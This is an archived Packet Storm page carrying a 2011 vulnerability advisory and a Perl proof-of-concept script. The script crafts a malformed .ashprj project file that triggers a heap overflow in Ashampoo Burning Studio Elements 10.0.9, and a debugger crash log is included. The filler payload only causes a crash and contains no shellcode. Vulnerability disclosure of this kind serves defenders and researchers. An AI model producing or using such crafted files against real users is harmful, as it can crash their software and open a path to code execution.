exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ashampoo Burning Studio Elements 10.0.9 Heap Overflow

Ashampoo Burning Studio Elements 10.0.9 Heap Overflow
Posted Oct 3, 2011
Authored by LiquidWorm | Site zeroscience.mk

Ashampoo Burning Studio Elements version 10.0.9 suffers from a heap overflow vulnerability. It fails to properly sanitize user supplied input when parsing .ashprj project file formats resulting in a crash corrupting the heap-based memory. The attacker can use this scenario to lure unsuspecting users to open malicious crafted .ashprj files with a potential for arbitrary code execution on the affected system.

tags | exploit, overflow, arbitrary, code execution
SHA-256 | f75aa6cbf3a17f5685e22633550ca4c85791c38d464e76137942ed86c5fbeea8

Ashampoo Burning Studio Elements 10.0.9 Heap Overflow

Change Mirror Download
#!/usr/bin/perl
#
#
# Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow Vulnerability
#
#
# Vendor: Ashampoo GmbH & Co. KG
# Product web page: http://www.ashampoo.com
# Affected version: 10.0.9
#
# Summary: Ashampoo Burning Studio Elements offers you everything you need to
# burn movies, music and data - fast and effectively. The software with the
# intuitive user interface focuses on the core competencies of burning software
# and offers you compact functions to tackle all tasks relating to your burning
# projects – easily create data discs, burn backups, rip music, create audio CDs
# or burn already existing film files on Blu-ray Disc and lots more.
#
# Desc: The application suffers from a heap overflow vulnerability because it
# fails to properly sanitize user supplied input when parsing .ashprj project
# file format resulting in a crash corrupting the heap-based memory. The
# attacker can use this scenario to lure unsuspecting users to open malicious
# crafted .ashprj files with a potential for arbitrary code execution on the
# affected system.
#
# ---------------------------------------------------------------------------
#
# HEAP[burningstudioelements.exe]: Heap block at 051F7F08 modified at 051F7F86 past requested size of 76
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f86 ecx=7c91d4fd edx=00f1eca5 esi=051f7f08 edi=00000076
# eip=7c90120e esp=00f1eea8 ebp=00f1eeac iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:000> g
# HEAP[burningstudioelements.exe]: Invalid Address specified to RtlFreeHeap( 01A70000, 051F7F10 )
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f08 ecx=7c91d4fd edx=00f1ecb6 esi=01a70000 edi=051f7f08
# eip=7c90120e esp=00f1eec0 ebp=00f1eec4 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:000> d edi
# 051f7f08 12 00 06 00 02 07 1a 01-01 00 00 00 e8 5c a0 e6 .............\..
# 051f7f18 cb f9 c3 b3 0c e8 5c a0-e6 cb 41 42 41 42 41 42 ......\...ABABAB
# 051f7f28 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f38 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f48 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f58 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f68 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f78 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 ab ABABABABABABABA.
#
# ---------------------------------------------------------------------------
#
#
# Tested on: Microsoft Windows XP Pro SP3 (En)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2011-5050
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5050.php
#
#
# 28.09.2011
#


use strict;

system("color 80");

my $filefm = "Aodrulez.ashprj"; # ;)

&banner;
print "\nThis PoC script will create the $filefm file!\n\n";
system("pause");

my $buffer = "\x41\x42" x 50000;

my $header = "\x61\x73\x68\x70\x72\x6A\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x56". #0x03 (ETX) removed.
"\x45\x52\x53\x08\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01".
"\x00\x00\x00\x66\x50\x52\x4A\xEA\x02\x00\x00\x00\x00\x00\x00\x49".
"\x44\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x70\x00\x72\x00\x6F".
"\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x2E\x00\x64\x00\x61\x00\x74".
"\x00\x61\x00\x64\x00\x69\x00\x73\x00\x63\x00\x66\x50\x50\x53\x00".
"\x00\x00\x00\x00\x00\x00\x00\x66\x50\x52\x4D\x10\x00\x00\x00\x00".
"\x00\x00\x00\x46\x4C\x41\x47\x04\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x66\x43\x4D\x50\x56\x02\x00\x00\x00\x00\x00\x00\x54".
"\x59\x50\x45\x08\x00\x00\x00\x00\x00\x00\x00\x44\x00\x61\x00\x74".
"\x00\x61\x00\x66\x50\x50\x53\x00\x00\x00\x00\x00\x00\x00\x00\x66".
"\x46\x53\x00\x88\x00\x00\x00\x00\x00\x00\x00\x46\x53\x00\x00\x36".
"\x00\x00\x00\x00\x00\x00\x00\x44\x00\x69\x00\x73\x00\x63\x00\x54".
"\x00\x79\x00\x70\x00\x65\x00\x41\x00\x70\x00\x70\x00\x72\x00\x6F".
"\x00\x70\x00\x72\x00\x69\x00\x61\x00\x74\x00\x65\x00\x2E\x00\x50".
"\x00\x72\x00\x69\x00\x6D\x00\x61\x00\x72\x00\x79\x00\x46\x53\x00".
"\x00\x3A\x00\x00\x00\x00\x00\x00\x00\x44\x00\x69\x00\x73\x00\x63".
"\x00\x54\x00\x79\x00\x70\x00\x65\x00\x41\x00\x70\x00\x70\x00\x72".
"\x00\x6F\x00\x70\x00\x72\x00\x69\x00\x61\x00\x74\x00\x65\x00\x2E".
"\x00\x53\x00\x65\x00\x63\x00\x6F\x00\x6E\x00\x64\x00\x61\x00\x72".
"\x00\x79\x00\x4C\x41\x42\x4C\x10\x00\x00\x00\x00\x00\x00\x00\x4D".
"\x00\x79\x00\x20\x00\x46\x00\x69\x00\x6C\x00\x65\x00\x73\x00\x66".
"\x4B\x49\x44\x7A\x01\x00\x00\x00\x00\x00\x00\x66\x46\x44\x52\x6E".
"\x01\x00\x00\x00\x00\x00\x00\x66\x4E\x4F\x44\xC7\x00\x00\x00\x00".
"\x00\x00\x00\x48\x45\x41\x44\x1F\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x80\xEB\x8C\x96\x7D\x35\xE1\xB3\x0C\x80\xEB\x8C\x96".
"\x7D\x35\xE1\xB3\x0C\x80\xEB\x8C\x96\x7D\x35\xE1\xB3\x0C\x4E\x41".
"\x4D\x45\x08\x00\x00\x00\x00\x00\x00\x00\x52\x00\x6F\x00\x6F\x00".
"\x74\x00\x44\x53\x52\x43\x7C\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x74\x00\x00\x00\x66\x00\x69\x00\x6C\x00\x65\x00\x3A\x00".
"\x2F\x00\x2F\x00\x2F\x00\x43\x00\x3A\x00\x2F\x00\x44\x00\x6F\x00".
"\x63\x00\x75\x00\x6D\x00\x65\x00\x6E\x00\x74\x00\x73\x00\x25\x00".
"\x32\x00\x30\x00\x61\x00\x6E\x00\x64\x00\x25\x00\x32\x00\x30\x00".
"\x53\x00\x65\x00\x74\x00\x74\x00\x69\x00\x6E\x00\x67\x00\x73\x00".
"\x2F\x00\x41\x00\x6C\x00\x6C\x00\x25\x00\x32\x00\x30\x00\x55\x00".
"\x73\x00\x65\x00\x72\x00\x73\x00\x2F\x00\x44\x00\x65\x00\x73\x00".
"\x6B\x00\x74\x00\x6F\x00\x70\x00\x2F\x00\x66\x4B\x49\x44\x8F\x00".
"\x00\x00\x00\x00\x00\x00\x66\x4C\x45\x46\x83\x00\x00\x00\x00\x00".
"\x00\x00\x66\x4E\x4F\x44\x77\x00\x00\x00\x00\x00\x00\x00\x48\x45".
"\x41\x44\x27\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xE8\x5C".
"\xA0\xE6\xCB\xF9\xC3\xB3\x0C\xE8\x5C\xA0\xE6\xCB";

my $footer = "\xF9\xC3\xB3\x0C\x28\x80\xBA\xA7\x70\x35\xE1\xB3\x0C\x50\x02\x00".
"\x00\x00\x00\x00\x00\x4E\x41\x4D\x45\x12\x00\x00\x00\x00\x00\x00".
"\x00\x4A\x00\x6F\x00\x78\x00\x79\x00\x31\x00\x2E\x00\x6C\x00\x6E".
"\x00\x6B\x00\x44\x53\x52\x43\x1A\x00\x00\x00\x00\x00\x00\x00\x3A".
"\x00\x00\x00\x12\x00\x00\x00\x4A\x00\x6F\x00\x78\x00\x79\x00\x31".
"\x00\x2E\x00\x6C\x00\x6E\x00\x6B\x00\x66\x43\x4D\x50\x28\x00\x00".
"\x00\x00\x00\x00\x00\x54\x59\x50\x45\x10\x00\x00\x00\x00\x00\x00".
"\x00\x45\x00\x6C\x00\x54\x00\x6F\x00\x72\x00\x69\x00\x74\x00\x6F".
"\x00\x66\x50\x50\x53\x00\x00\x00\x00\x00\x00\x00\x00";

my $fringe = $header.$buffer.$footer;

print "\n - Preparing to write to file...\n";
sleep 1;
open (prj, ">./$filefm") || die "\nCan't open $filefm: $!";
print "\n - Writing to file...\n";
print prj $fringe;
close (prj);
sleep 2;
print "\n - File \"$filefm\" successfully crafted!\n\n - t00t!\n";

sub banner {

print "\n";
print "_" x 51;
print "\n\n Ashampoo Burning Studio Elements 10 Heap Overflow\n\n";
print "\tCopyleft (c) 2011 - Zero Science Lab\n\n";
print "\t\tID: ZSL-2011-5050\n\n";
print "_" x 51;
print "\n";

}

#EOF
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close